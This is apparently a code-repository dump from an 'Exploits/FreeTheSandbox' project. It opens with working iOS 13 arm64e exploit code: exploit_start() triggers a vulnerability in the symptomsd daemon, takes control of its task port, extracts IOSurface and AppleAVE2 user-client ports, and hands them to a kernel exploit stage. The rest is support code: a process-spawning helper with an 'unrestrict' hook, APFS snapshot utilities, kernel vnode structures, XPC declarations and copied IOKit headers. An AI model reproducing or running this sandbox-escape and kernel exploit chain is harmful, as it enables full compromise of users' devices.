0x%llx\\n\", rt, msg2.local_map_addr);\n    *local_map_addr = msg2.local_map_addr;\n}\n\nvoid Reply_notify_completion(){\n    struct {\n        mach_msg_header_t Head;\n        
mach_msg_trailer_t trailer;\n    }msg = {0};\n    msg.Head.msgh_size = sizeof(msg);\n    msg.Head.msgh_local_port = our_serverport;\n    mach_msg_receive(&msg.Head);\n}\n\nvoid Send_notify_msg(){\n    struct {\n        mach_msg_header_t Head;\n    }msg = {0};\n    msg.Head.msgh_bits = MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);\n    msg.Head.msgh_size = sizeof(msg);\n    msg.Head.msgh_remote_port = Retrieve_symptomsd_bootstrap_port();\n    \n    mach_msg(&msg.Head, MACH_SEND_MSG, msg.Head.msgh_size, 0, 0, 0, 0);\n}\n\nuint64_t PACSupport_PACGA(uint64_t code_ptr, uint64_t modifier){\n    \n    __asm__ __volatile__(\n                         \"pacga    x0, x0, x1\\n\"\n                         \"mov    x18, x0\\n\"\n                         \"mov    %0, x18\\n\"\n                         :\"=r\"(code_ptr));\n    return code_ptr;\n}\n\nvoid test_thread(){\n    \n    arm_thread_state64_t state = {0};\n    state.__opaque_pc = 0x6666666666666666;\n    for(int i=0; i<29; i++){\n        state.__x[i] = 0x6666666666666666;\n    }\n    thread_t th;\n    thread_create_running(mach_task_self(), ARM_THREAD_STATE64, &state, ARM_THREAD_STATE64_COUNT, &th);\n    \n}\n\n#define printf(X,X1...) 
{char logdata[256];snprintf(logdata, sizeof(logdata), X, X1);extern void log_toView(const char *input_cstr);log_toView(logdata);}\n#define printf2(X) {extern void log_toView(const char *input_cstr);log_toView(X);}\n\nvoid exploit_start(){\n    \n    int kr = 0;\n    \n    if(setjmp(jmpb))\n        return;\n    \n    extern void log_toView(const char *input_cstr);\n    log_toView(\"+++++ ios13 pwn (arm64e) +++++\\n\");\n    \n    Find_aopGadgets_speed();\n    Prepare_our_Mach_server();\n    \n    symptomsd_vuln_prepare1();\n    symptomsd_vuln_prepare2(1);\n    symptomsd_vuln_trigger(1);\n    symptomsd_vuln_prepare2(0);\n    symptomsd_vuln_trigger(0);\n    symptomsd_vuln_trigger(0);\n    symptomsd_vuln_trigger(0);\n    symptomsd_vuln_trigger(0);\n    \n    symptomsd_vuln_trigger(2); // <== 6\n    \n    //extern void ppp();ppp();\n    while(1){\n        // loop here, waiting to be notified that they got the message\n        usleep(5000);\n        if(Send_our_serverport())\n            break;\n    }\n    \n    extern void ppp();ppp();\n    task_t symptomsd_task = Retrieve_symptomsd_task_port();\n    \n    pid_t symptomsd_pid = 0;\n    kr = pid_for_task(symptomsd_task, &symptomsd_pid);\n    if(kr == KERN_SUCCESS){\n        //extern void ppp();ppp();\n    }\n    else\n    {//extern void ppp();ppp();\n    }\n    \n    // Ask the unsandbox daemon which has been totally controlled at this moment\n    // To open IO device ports, and passing to us for next stage kernel attacking.\n    //extern void ppp();ppp();\n    \n    Reply_notify_completion(); // Waiting for pwned proc preparing port\n    \n    uint32_t IOSurfaceRootUserClient_port = 0;\n    task_get_special_port(symptomsd_task, TASK_SEATBELT_PORT, &IOSurfaceRootUserClient_port);\n    //extern void ppp();ppp();\n    \n    Send_notify_msg();\n    Reply_notify_completion(); // Waiting preparing another port\n    \n    uint32_t AppleAVE2UserClient_port = 0;\n    task_get_special_port(symptomsd_task, TASK_ACCESS_PORT, 
&AppleAVE2UserClient_port);\n\n    printf2(\"1\\n\");\n    \n    void kernel_exp_start(uint32_t ave_ioconn, uint32_t surface_ioconn);\n    kernel_exp_start(AppleAVE2UserClient_port, IOSurfaceRootUserClient_port);\n}\n\n#endif\n"
  },
  {
    "path": "Exploits/FreeTheSandbox/ios_7st_utils.m",
    "content": "//\n//  ios_7st_utils.c\n//  ios_7st_test\n//\n//  Created by bb on 12/26/19.\n//  Copyright © 2019 bb. All rights reserved.\n//\n\n#include <stdio.h>\n#include <setjmp.h>\n#include <stdlib.h>\n#include <sys/mman.h>\n#include <sys/sysctl.h>\n#include <mach/mach.h>\n#include <mach/thread_act.h>\n#include <mach/semaphore.h>\n#include <mach/mach_traps.h>\n#include <mach/thread_status.h>\n#include <pthread/pthread.h>\n#include <IOSurface/IOSurfaceRef.h>\n#include <dirent.h>\n#include <mach-o/dyld.h>\n#include <sys/stat.h>\n#include <spawn.h>\n#import <Foundation/Foundation.h>\n\n#define RAWLOG(str, args...) do { printf(\"%s\\n\", [[NSString stringWithFormat:CFSTR(str), ##args] UTF8String]); } while(false)\n//#define RAWLOG(str, args...) do { writetofile([NSString stringWithFormat:CFSTR(str), ##args]); } while(false)\n\n/*extern char *itunes_export_path;\nvoid writetofile(NSString *str){\n    NSString *oldstr = [NSString stringWithContentsOfFile:[NSString stringWithUTF8String:itunes_export_path] encoding:NSUTF8StringEncoding error:nil];\n    if(oldstr){\n        oldstr = [oldstr stringByAppendingString:@\"\\n\"];\n        oldstr = [oldstr stringByAppendingString:str];\n    }\n    else{\n        oldstr = str;\n    }\n    [oldstr writeToFile:[NSString stringWithUTF8String:itunes_export_path] atomically:YES encoding:NSUTF8StringEncoding error:nil];\n}*/\n\n#define LOG(str, args...) 
RAWLOG(\"[*] \" str, ##args)\n\nextern char **environ;\nNSData *lastSystemOutput=nil;\n\nint runCommandv(const char *cmd, int argc, const char * const* argv, void (^unrestrict)(pid_t)) {\n    pid_t pid;\n    posix_spawn_file_actions_t *actions = NULL;\n    posix_spawn_file_actions_t actionsStruct;\n    int out_pipe[2];\n    bool valid_pipe = false;\n    posix_spawnattr_t *attr = NULL;\n    posix_spawnattr_t attrStruct;\n    \n    NSMutableString *cmdstr = [NSMutableString stringWithCString:cmd encoding:NSUTF8StringEncoding];\n    for (int i=1; i<argc; i++) {\n        [cmdstr appendFormat:@\" \\\"%s\\\"\", argv[i]];\n    }\n    \n    valid_pipe = pipe(out_pipe) == ERR_SUCCESS;\n    if (valid_pipe && posix_spawn_file_actions_init(&actionsStruct) == ERR_SUCCESS) {\n        actions = &actionsStruct;\n        posix_spawn_file_actions_adddup2(actions, out_pipe[1], 1);\n        posix_spawn_file_actions_adddup2(actions, out_pipe[1], 2);\n        posix_spawn_file_actions_addclose(actions, out_pipe[0]);\n        posix_spawn_file_actions_addclose(actions, out_pipe[1]);\n    }\n    \n    if (unrestrict && posix_spawnattr_init(&attrStruct) == ERR_SUCCESS) {\n        attr = &attrStruct;\n        posix_spawnattr_setflags(attr, POSIX_SPAWN_START_SUSPENDED);\n    }\n    \n    int rv = posix_spawn(&pid, cmd, actions, attr, (char *const *)argv, environ);\n    LOG(\"%s(%d) command: %@\", __FUNCTION__, pid, cmdstr);\n    \n    if (unrestrict) {\n        unrestrict(pid);\n        kill(pid, SIGCONT);\n    }\n    \n    if (valid_pipe) {\n        close(out_pipe[1]);\n    }\n    \n    if (rv == ERR_SUCCESS) {\n        if (valid_pipe) {\n            NSMutableData *outData = [NSMutableData new];\n            char c;\n            char s[2] = {0, 0};\n            NSMutableString *line = [NSMutableString new];\n            while (read(out_pipe[0], &c, 1) == 1) {\n                [outData appendBytes:&c length:1];\n                if (c == '\\n') {\n                    LOG(\"%s(%d): %@\", 
__FUNCTION__, pid, line);\n                    [line setString:@\"\"];\n                } else {\n                    s[0] = c;\n                    [line appendString:@(s)];\n                }\n            }\n            if ([line length] > 0) {\n                LOG(\"%s(%d): %@\", __FUNCTION__, pid, line);\n            }\n            lastSystemOutput = [outData copy];\n        }\n        if (waitpid(pid, &rv, 0) == -1) {\n            LOG(\"ERROR: Waitpid failed\");\n        } else {\n            LOG(\"%s(%d) completed with exit status %d\", __FUNCTION__, pid, WEXITSTATUS(rv));\n        }\n        \n    } else {\n        LOG(\"%s(%d): ERROR posix_spawn failed (%d): %s\", __FUNCTION__, pid, rv, strerror(rv));\n        rv <<= 8; // Put error into WEXITSTATUS\n    }\n    if (valid_pipe) {\n        close(out_pipe[0]);\n    }\n    return rv;\n}\n\nint runCommand(const char *cmd, ...) {\n    va_list ap, ap2;\n    int argc = 1;\n    \n    va_start(ap, cmd);\n    va_copy(ap2, ap);\n    \n    while (va_arg(ap, const char *) != NULL) {\n        argc++;\n    }\n    va_end(ap);\n    \n    const char *argv[argc+1];\n    argv[0] = cmd;\n    for (int i=1; i<argc; i++) {\n        argv[i] = va_arg(ap2, const char *);\n    }\n    va_end(ap2);\n    argv[argc] = NULL;\n    \n    int rv = runCommandv(cmd, argc, argv, NULL);\n    return WEXITSTATUS(rv);\n}\n\n"
  },
  {
    "path": "Exploits/FreeTheSandbox/libsnappy.c",
    "content": "//\n//  libsnappy.c\n//  ios_7st_test\n//\n//  Created by bb on 1/20/20.\n//  Copyright © 2020 bb. All rights reserved.\n//\n\n/* Copyright 2018 Sam Bingner All Rights Reserved\n */\n#include <unistd.h>\n#include <stdlib.h>\n#include <stdio.h>\n#include <sys/snapshot.h>\n#include <strings.h>\n#include <getopt.h>\n#import <CoreFoundation/CoreFoundation.h>\n#if __has_include(<IOKit/IOKit.h>)\n#include <IOKit/IOKit.h>\n#else\n#include <mach/error.h>\ntypedef mach_port_t     io_object_t;\ntypedef io_object_t     io_registry_entry_t;\ntypedef char            io_string_t[512];\ntypedef UInt32          IOOptionBits;\n\nextern const mach_port_t kIOMasterPortDefault;\n\nio_registry_entry_t IORegistryEntryFromPath(mach_port_t masterPort, const io_string_t path);\nCFTypeRef IORegistryEntryCreateCFProperty(io_registry_entry_t entry, CFStringRef key, CFAllocatorRef allocator, IOOptionBits options);\nkern_return_t IOObjectRelease(io_object_t object );\n#endif\n#include \"libsnappy.h\"\n\nstatic char *copyBootHash(void);\n#define APPLESNAP \"com.apple.os.update-\"\n\n__attribute__((aligned(4)))\ntypedef struct val_attrs {\n    uint32_t        length;\n    attribute_set_t        returned;\n    attrreference_t        name_info;\n    char            name[MAXPATHLEN];\n} val_attrs_t;\n\nbool snapshot_check(int dirfd, const char *name)\n{\n    const char **snapshots = snapshot_list(dirfd);\n    if (snapshots == NULL) {\n        return false;\n    }\n    for (const char **snapshot = snapshots; *snapshot; snapshot++) {\n        if (strcmp(name, *snapshot)==0) {\n            free(snapshots);\n            return true;\n        }\n    }\n    free(snapshots);\n    return false;\n}\n\nconst char **snapshot_list(int dirfd)\n{\n    uint64_t nameOffset = 257 * sizeof(char *);\n    uint64_t snapshots_size = nameOffset + MAXPATHLEN;\n    char **snapshots = (char **)calloc(snapshots_size, sizeof(char));\n    struct attrlist attr_list = { 0 };\n    \n    if (snapshots == NULL) {\n   
     perror(\"Unable to allocate memory for snapshot names\");\n        return NULL;\n    }\n    \n    attr_list.commonattr = ATTR_BULK_REQUIRED;\n    \n    val_attrs_t buf;\n    bzero(&buf, sizeof(buf));\n    int retcount;\n    int snapidx = 0;\n    while ((retcount = fs_snapshot_list(dirfd, &attr_list, &buf, sizeof(buf), 0))>0) {\n        val_attrs_t *entry = &buf;\n        \n        int i;\n        for (i=0; i<retcount; i++) {\n            if (entry->returned.commonattr & ATTR_CMN_NAME) {\n                size_t size = strlen(entry->name) + 1;\n                if (snapidx > 255) {\n                    fprintf(stderr, \"Too many snapshots to handle\\n\");\n                    return (const char **)snapshots;\n                }\n                if (nameOffset + size > snapshots_size) {\n                    snapshots_size += MAXPATHLEN;\n                    snapshots = (char **)reallocf(snapshots, snapshots_size);\n                    if (snapshots == NULL) {\n                        perror(\"Couldn't realloc snapshot buffer\");\n                        return NULL;\n                    }\n                }\n                snapshots[snapidx] = (char *)snapshots + nameOffset;\n                nameOffset += size;\n                strncpy(snapshots[snapidx], entry->name, size);\n                snapidx++;\n            }\n            \n            entry = (val_attrs_t *)((char *)entry + entry->length);\n        }\n        bzero(&buf, sizeof(buf));\n    }\n    \n    if (retcount < 0) {\n        perror(\"fs_snapshot_list\");\n        return nil;\n    }\n    \n    return (const char **)snapshots;\n}\n\nstatic int sha1_to_str(const unsigned char *hash, size_t hashlen, char *buf, size_t buflen)\n{\n    if (buflen < (hashlen*2+1)) {\n        return -1;\n    }\n    \n    int i;\n    for (i=0; i<hashlen; i++) {\n        sprintf(buf+i*2, \"%02X\", hash[i]);\n    }\n    buf[i*2] = 0;\n    return ERR_SUCCESS;\n}\n\nstatic char *copyBootHash(void)\n{\n    io_registry_entry_t 
chosen = IORegistryEntryFromPath(kIOMasterPortDefault, \"IODeviceTree:/chosen\");\n    \n    if (!MACH_PORT_VALID(chosen)) {\n        printf(\"Unable to get IODeviceTree:/chosen port\\n\");\n        return NULL;\n    }\n    \n    CFDataRef hash = (CFDataRef)IORegistryEntryCreateCFProperty(chosen, CFSTR(\"boot-manifest-hash\"), kCFAllocatorDefault, 0);\n    \n    IOObjectRelease(chosen);\n    \n    if (hash == nil) {\n        fprintf(stderr, \"Unable to read boot-manifest-hash\\n\");\n        return NULL;\n    }\n    \n    if (CFGetTypeID(hash) != CFDataGetTypeID()) {\n        fprintf(stderr, \"Error hash is not data type\\n\");\n        CFRelease(hash);\n        return NULL;\n    }\n    \n    // Make a hex string out of the hash\n    \n    CFIndex length = CFDataGetLength(hash) * 2 + 1;\n    char *manifestHash = (char*)calloc(length, sizeof(char));\n    \n    int ret = sha1_to_str(CFDataGetBytePtr(hash), CFDataGetLength(hash), manifestHash, length);\n    \n    CFRelease(hash);\n    \n    if (ret != ERR_SUCCESS) {\n        printf(\"Unable to generate bootHash string\\n\");\n        free(manifestHash);\n        return NULL;\n    }\n    \n    return manifestHash;\n}\n\nchar *copySystemSnapshot()\n{\n    char *hash = copyBootHash();\n    if (hash == NULL) {\n        return NULL;\n    }\n    char *hashsnap = malloc(strlen(APPLESNAP) + strlen(hash) + 1);\n    strcpy(hashsnap, APPLESNAP);\n    strcpy(hashsnap + strlen(APPLESNAP), hash);\n    free(hash);\n    return hashsnap;\n}\n"
  },
  {
    "path": "Exploits/FreeTheSandbox/libsnappy.h",
    "content": "//\n//  libsnappy.h\n//  ios_7st_test\n//\n//  Created by bb on 1/20/20.\n//  Copyright © 2020 bb. All rights reserved.\n//\n\n/* Copyright 2018 Sam Bingner All Rights Reserved\n */\n\n#ifndef _SNAPPY_H\n#define _SNAPPY_H\n\nconst char **snapshot_list(int dirfd);\nbool snapshot_check(int dirfd, const char *name);\nchar *copySystemSnapshot(void);\n\n#endif\n"
  },
  {
    "path": "Exploits/FreeTheSandbox/vnode.h",
    "content": "#import <sys/mount.h>\n#import <sys/event.h>\n\ntypedef struct {\n    union {\n        uint64_t lck_mtx_data;\n        uint64_t lck_mtx_tag;\n    };\n    union {\n        struct {\n            uint16_t lck_mtx_waiters;\n            uint8_t lck_mtx_pri;\n            uint8_t lck_mtx_type;\n        };\n        struct {\n            struct _lck_mtx_ext_ *lck_mtx_ptr;\n        };\n    };\n} lck_mtx_t;\n\ntypedef struct vnode_resolve* vnode_resolve_t;\n\ntypedef uint32_t kauth_action_t;\nLIST_HEAD(buflists, buf);\n\nstruct vnode {\n    lck_mtx_t v_lock;            /* vnode mutex */\n    TAILQ_ENTRY(vnode) v_freelist;        /* vnode freelist */\n    TAILQ_ENTRY(vnode) v_mntvnodes;        /* vnodes for mount point */\n    TAILQ_HEAD(, namecache) v_ncchildren;    /* name cache entries that regard us as their parent */\n    LIST_HEAD(, namecache) v_nclinks;    /* name cache entries that name this vnode */\n    vnode_t     v_defer_reclaimlist;        /* in case we have to defer the reclaim to avoid recursion */\n    uint32_t v_listflag;            /* flags protected by the vnode_list_lock (see below) */\n    uint32_t v_flag;            /* vnode flags (see below) */\n    uint16_t v_lflag;            /* vnode local and named ref flags */\n    uint8_t     v_iterblkflags;        /* buf iterator flags */\n    uint8_t     v_references;            /* number of times io_count has been granted */\n    int32_t     v_kusecount;            /* count of in-kernel refs */\n    int32_t     v_usecount;            /* reference count of users */\n    int32_t     v_iocount;            /* iocounters */\n    void *   v_owner;            /* act that owns the vnode */\n    uint16_t v_type;            /* vnode type */\n    uint16_t v_tag;                /* type of underlying data */\n    uint32_t v_id;                /* identity of vnode contents */\n    union {\n        struct mount    *vu_mountedhere;/* ptr to mounted vfs (VDIR) */\n        struct socket    *vu_socket;    /* unix 
ipc (VSOCK) */\n        struct specinfo    *vu_specinfo;    /* device (VCHR, VBLK) */\n        struct fifoinfo    *vu_fifoinfo;    /* fifo (VFIFO) */\n        struct ubc_info *vu_ubcinfo;    /* valid for (VREG) */\n    } v_un;\n    struct    buflists v_cleanblkhd;        /* clean blocklist head */\n    struct    buflists v_dirtyblkhd;        /* dirty blocklist head */\n    struct klist v_knotes;            /* knotes attached to this vnode */\n    /*\n     * the following 4 fields are protected\n     * by the name_cache_lock held in\n     * excluive mode\n     */\n    kauth_cred_t    v_cred;            /* last authorized credential */\n    kauth_action_t    v_authorized_actions;    /* current authorized actions for v_cred */\n    int        v_cred_timestamp;    /* determine if entry is stale for MNTK_AUTH_OPAQUE */\n    int        v_nc_generation;    /* changes when nodes are removed from the name cache */\n    /*\n     * back to the vnode lock for protection\n     */\n    int32_t        v_numoutput;            /* num of writes in progress */\n    int32_t        v_writecount;            /* reference count of writers */\n    const char *v_name;            /* name component of the vnode */\n    vnode_t v_parent;            /* pointer to parent vnode */\n    struct lockf    *v_lockf;        /* advisory lock list head */\n    int     (**v_op)(void *);        /* vnode operations vector */\n    mount_t v_mount;            /* ptr to vfs we are in */\n    void *    v_data;                /* private data for fs */\n    \n    struct label *v_label;            /* MAC security label */\n    \n    //#if CONFIG_TRIGGERS\n    vnode_resolve_t v_resolve;        /* trigger vnode resolve info (VDIR only) */\n    //#endif /* CONFIG_TRIGGERS */\n};\n\n\n"
  },
  {
    "path": "Exploits/FreeTheSandbox/xpc.h",
    "content": "//\n//  xpc.h\n//  D22_final_iOS\n//\n//  Created by aa on 3/23/19.\n//  Copyright © 2019 aa. All rights reserved.\n//\n\n#ifndef xpc_h\n#define xpc_h\n\n\n#define XPC_DECL(name) typedef xpc_object_t name##_t\n\nextern const char *const _xpc_error_key_description;\n#define XPC_ERROR_KEY_DESCRIPTION _xpc_error_key_description\n\ntypedef void * xpc_object_t;\nXPC_DECL(xpc_connection);\ntypedef void (^xpc_handler_t)(xpc_object_t object);\n\nvoid\nxpc_connection_send_message_with_reply(xpc_connection_t connection,\n                                       xpc_object_t message, dispatch_queue_t _Nullable replyq,\n                                       xpc_handler_t handler);\nxpc_object_t xpc_connection_send_message_with_reply_sync(xpc_connection_t connection,\n                                                         xpc_object_t message);\nvoid\nxpc_connection_resume(xpc_connection_t connection);\nvoid\nxpc_connection_send_message(xpc_connection_t connection, xpc_object_t message);\n\npid_t\nxpc_connection_get_pid(xpc_connection_t connection);\n\nxpc_connection_t\nxpc_connection_create_mach_service(const char *name, dispatch_queue_t _Nullable targetq, uint64_t flags);\n\nxpc_object_t\nxpc_dictionary_create(const char * _Nonnull const * _Nullable keys,\n                      const xpc_object_t _Nullable * _Nullable values, size_t count);\nvoid\nxpc_dictionary_set_int64(xpc_object_t xdict, const char *key, int64_t value);\nvoid\nxpc_dictionary_set_uint64(xpc_object_t xdict, const char *key, uint64_t value);\nvoid\nxpc_dictionary_set_data(xpc_object_t xdict, const char *key, const void *bytes,\n                        size_t length);\nvoid\nxpc_dictionary_set_value(xpc_object_t xdict, const char *key,\n                         xpc_object_t _Nullable value);\nvoid\nxpc_dictionary_set_string(xpc_object_t xdict, const char *key,\n                          const char *string);\nvoid\nxpc_dictionary_set_bool(xpc_object_t xdict, const char *key, bool 
value);\n\nvoid\nxpc_dictionary_set_mach_send(xpc_object_t xdict, const char *key, mach_port_t port);\n\nvoid\nxpc_dictionary_set_mach_recv(xpc_object_t xdict, const char *key, mach_port_t port);\n\n\nconst char * _Nullable\nxpc_dictionary_get_string(xpc_object_t xdict, const char *key);\n\nxpc_object_t\nxpc_array_create(const xpc_object_t _Nonnull * _Nullable objects, size_t count);\nvoid\nxpc_array_append_value(xpc_object_t xarray, xpc_object_t value);\n\nxpc_object_t\nxpc_data_create(const void * _Nullable bytes, size_t length);\nvoid\nxpc_connection_cancel(xpc_connection_t connection);\n\nxpc_object_t xpc_null_create(void);\n\nvoid\nxpc_connection_resume(xpc_connection_t connection);\nchar *\nxpc_copy_description(xpc_object_t object);\n\n\n#endif /* xpc_h */\n"
  },
  {
    "path": "Exploits/IOKit/IOKitKeys.h",
    "content": "/*\n * Copyright (c) 1998-2000 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_START@\n *\n * This file contains Original Code and/or Modifications of Original Code\n * as defined in and that are subject to the Apple Public Source License\n * Version 2.0 (the 'License'). You may not use this file except in\n * compliance with the License. The rights granted to you under the License\n * may not be used to create, or enable the creation or redistribution of,\n * unlawful or unlicensed copies of an Apple operating system, or to\n * circumvent, violate, or enable the circumvention or violation of, any\n * terms of an Apple operating system software license agreement.\n *\n * Please obtain a copy of the License at\n * http://www.opensource.apple.com/apsl/ and read it before using this file.\n *\n * The Original Code and all software distributed under the License are\n * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER\n * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,\n * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.\n * Please see the License for the specific language governing rights and\n * limitations under the License.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_END@\n */\n/*\n * Copyright (c) 1999 Apple Computer, Inc.  
All rights reserved.\n *\n * Common symbol definitions for IOKit.\n *\n * HISTORY\n *\n */\n\n\n#ifndef _IOKIT_IOKITKEYS_H\n#define _IOKIT_IOKITKEYS_H\n\n// properties found in the registry root\n#define kIOKitBuildVersionKey        \"IOKitBuildVersion\"\n#define kIOKitDiagnosticsKey        \"IOKitDiagnostics\"\n// a dictionary keyed by plane name\n#define kIORegistryPlanesKey        \"IORegistryPlanes\"\n#define kIOCatalogueKey            \"IOCatalogue\"\n\n// registry plane names\n#define kIOServicePlane            \"IOService\"\n#define kIOPowerPlane            \"IOPower\"\n#define kIODeviceTreePlane        \"IODeviceTree\"\n#define kIOAudioPlane            \"IOAudio\"\n#define kIOFireWirePlane        \"IOFireWire\"\n#define kIOUSBPlane            \"IOUSB\"\n\n// registry ID number\n#define kIORegistryEntryIDKey        \"IORegistryEntryID\"\n// property name to get array of property names\n#define kIORegistryEntryPropertyKeysKey \"IORegistryEntryPropertyKeys\"\n\n// IOService class name\n#define kIOServiceClass            \"IOService\"\n\n// IOResources class name\n#define kIOResourcesClass        \"IOResources\"\n\n// IOService driver probing property names\n#define kIOClassKey            \"IOClass\"\n#define kIOProbeScoreKey        \"IOProbeScore\"\n#define kIOKitDebugKey            \"IOKitDebug\"\n\n// IOService matching property names\n#define kIOProviderClassKey        \"IOProviderClass\"\n#define kIONameMatchKey            \"IONameMatch\"\n#define kIOPropertyMatchKey        \"IOPropertyMatch\"\n#define kIOPropertyExistsMatchKey    \"IOPropertyExistsMatch\"\n#define kIOPathMatchKey            \"IOPathMatch\"\n#define kIOLocationMatchKey        \"IOLocationMatch\"\n#define kIOParentMatchKey        \"IOParentMatch\"\n#define kIOResourceMatchKey        \"IOResourceMatch\"\n#define kIOResourceMatchedKey        \"IOResourceMatched\"\n#define kIOMatchedServiceCountKey    \"IOMatchedServiceCountMatch\"\n\n#define kIONameMatchedKey        
\"IONameMatched\"\n\n#define kIOMatchCategoryKey        \"IOMatchCategory\"\n#define kIODefaultMatchCategoryKey    \"IODefaultMatchCategory\"\n\n// IOService default user client class, for loadable user clients\n#define kIOUserClientClassKey        \"IOUserClientClass\"\n\n// key to find IOMappers\n#define kIOMapperIDKey                \"IOMapperID\"\n\n#define kIOUserClientCrossEndianKey        \"IOUserClientCrossEndian\"\n#define kIOUserClientCrossEndianCompatibleKey    \"IOUserClientCrossEndianCompatible\"\n#define kIOUserClientSharedInstanceKey        \"IOUserClientSharedInstance\"\n// diagnostic string describing the creating task\n#define kIOUserClientCreatorKey        \"IOUserClientCreator\"\n\n// IOService notification types\n#define kIOPublishNotification        \"IOServicePublish\"\n#define kIOFirstPublishNotification    \"IOServiceFirstPublish\"\n#define kIOMatchedNotification        \"IOServiceMatched\"\n#define kIOFirstMatchNotification    \"IOServiceFirstMatch\"\n#define kIOTerminatedNotification    \"IOServiceTerminate\"\n#define kIOWillTerminateNotification    \"IOServiceWillTerminate\"\n\n// IOService interest notification types\n#define kIOGeneralInterest        \"IOGeneralInterest\"\n#define kIOBusyInterest            \"IOBusyInterest\"\n#define kIOAppPowerStateInterest    \"IOAppPowerStateInterest\"\n#define kIOPriorityPowerStateInterest    \"IOPriorityPowerStateInterest\"\n\n#define kIOPlatformDeviceMessageKey     \"IOPlatformDeviceMessage\"\n\n// IOService interest notification types\n#define kIOCFPlugInTypesKey        \"IOCFPlugInTypes\"\n\n// properties found in services that implement command pooling\n#define kIOCommandPoolSizeKey        \"IOCommandPoolSize\"        // (OSNumber)\n\n// properties found in services that implement priority\n#define kIOMaximumPriorityCountKey    \"IOMaximumPriorityCount\"    // (OSNumber)\n\n// properties found in services that have transfer constraints\n#define kIOMaximumBlockCountReadKey             
\"IOMaximumBlockCountRead\"             // (OSNumber)\n#define kIOMaximumBlockCountWriteKey            \"IOMaximumBlockCountWrite\"            // (OSNumber)\n#define kIOMaximumByteCountReadKey              \"IOMaximumByteCountRead\"              // (OSNumber)\n#define kIOMaximumByteCountWriteKey             \"IOMaximumByteCountWrite\"             // (OSNumber)\n#define kIOMaximumSegmentCountReadKey           \"IOMaximumSegmentCountRead\"           // (OSNumber)\n#define kIOMaximumSegmentCountWriteKey          \"IOMaximumSegmentCountWrite\"          // (OSNumber)\n#define kIOMaximumSegmentByteCountReadKey       \"IOMaximumSegmentByteCountRead\"       // (OSNumber)\n#define kIOMaximumSegmentByteCountWriteKey      \"IOMaximumSegmentByteCountWrite\"      // (OSNumber)\n#define kIOMinimumSegmentAlignmentByteCountKey  \"IOMinimumSegmentAlignmentByteCount\"  // (OSNumber)\n#define kIOMaximumSegmentAddressableBitCountKey \"IOMaximumSegmentAddressableBitCount\" // (OSNumber)\n#define kIOMinimumSaturationByteCountKey        \"IOMinimumSaturationByteCount\"        // (OSNumber)\n\n// properties found in services that wish to describe an icon\n//\n// IOIcon =\n// {\n//     CFBundleIdentifier   = \"com.example.driver.example\";\n//     IOBundleResourceFile = \"example.icns\";\n// };\n//\n// where IOBundleResourceFile is the filename of the resource\n\n#define kIOIconKey               \"IOIcon\"               // (OSDictionary)\n#define kIOBundleResourceFileKey \"IOBundleResourceFile\" // (OSString)\n\n#define kIOBusBadgeKey           \"IOBusBadge\"           // (OSDictionary)\n#define kIODeviceIconKey         \"IODeviceIcon\"         // (OSDictionary)\n\n// property of root that describes the machine's serial number as a string\n#define kIOPlatformSerialNumberKey    \"IOPlatformSerialNumber\"    // (OSString)\n\n// property of root that describes the machine's UUID as a string\n#define kIOPlatformUUIDKey    \"IOPlatformUUID\"    // (OSString)\n\n// IODTNVRAM property 
keys\n#define kIONVRAMDeletePropertyKey    \"IONVRAM-DELETE-PROPERTY\"\n#define kIONVRAMSyncNowPropertyKey    \"IONVRAM-SYNCNOW-PROPERTY\"\n#define kIONVRAMActivateCSRConfigPropertyKey    \"IONVRAM-ARMCSR-PROPERTY\"\n#define kIODTNVRAMPanicInfoKey        \"aapl,panic-info\"\n\n// keys for complex boot information\n#define kIOBootDeviceKey          \"IOBootDevice\"        // dict | array of dicts\n#define kIOBootDevicePathKey      \"IOBootDevicePath\"    // arch-neutral OSString\n#define kIOBootDeviceSizeKey      \"IOBootDeviceSize\"    // OSNumber of bytes\n\n// keys for OS Version information\n#define kOSBuildVersionKey        \"OS Build Version\"\n\n#endif /* ! _IOKIT_IOKITKEYS_H */\n"
  },
  {
    "path": "Exploits/IOKit/IOKitLib.h",
    "content": "/*\n * Copyright (c) 1998-2014 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_LICENSE_HEADER_START@\n *\n * This file contains Original Code and/or Modifications of Original Code\n * as defined in and that are subject to the Apple Public Source License\n * Version 2.0 (the 'License'). You may not use this file except in\n * compliance with the License. Please obtain a copy of the License at\n * http://www.opensource.apple.com/apsl/ and read it before using this\n * file.\n *\n * The Original Code and all software distributed under the License are\n * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER\n * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,\n * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.\n * Please see the License for the specific language governing rights and\n * limitations under the License.\n *\n * @APPLE_LICENSE_HEADER_END@\n */\n/*\n * HISTORY\n *\n */\n\n/*\n * IOKit user library\n */\n\n#ifndef _IOKIT_IOKITLIB_H\n#define _IOKIT_IOKITLIB_H\n\n#ifdef KERNEL\n#error This file is not for kernel use\n#endif\n\n#include <sys/cdefs.h>\n#include <sys/types.h>\n\n#include <mach/mach_types.h>\n#include <mach/mach_init.h>\n\n#include <CoreFoundation/CFBase.h>\n#include <CoreFoundation/CFDictionary.h>\n#include <CoreFoundation/CFRunLoop.h>\n\n#include \"IOTypes.h\"\n#include \"IOKitKeys.h\"\n\n#include \"OSMessageNotification.h\"\n\n#include <AvailabilityMacros.h>\n\n#include <dispatch/dispatch.h>\n\n__BEGIN_DECLS\n\n/*! @header IOKitLib\n IOKitLib implements non-kernel task access to common IOKit object types - IORegistryEntry, IOService, IOIterator etc. These functions are generic - families may provide API that is more specific.<br>\n IOKitLib represents IOKit objects outside the kernel with the types io_object_t, io_registry_entry_t, io_service_t, & io_connect_t. 
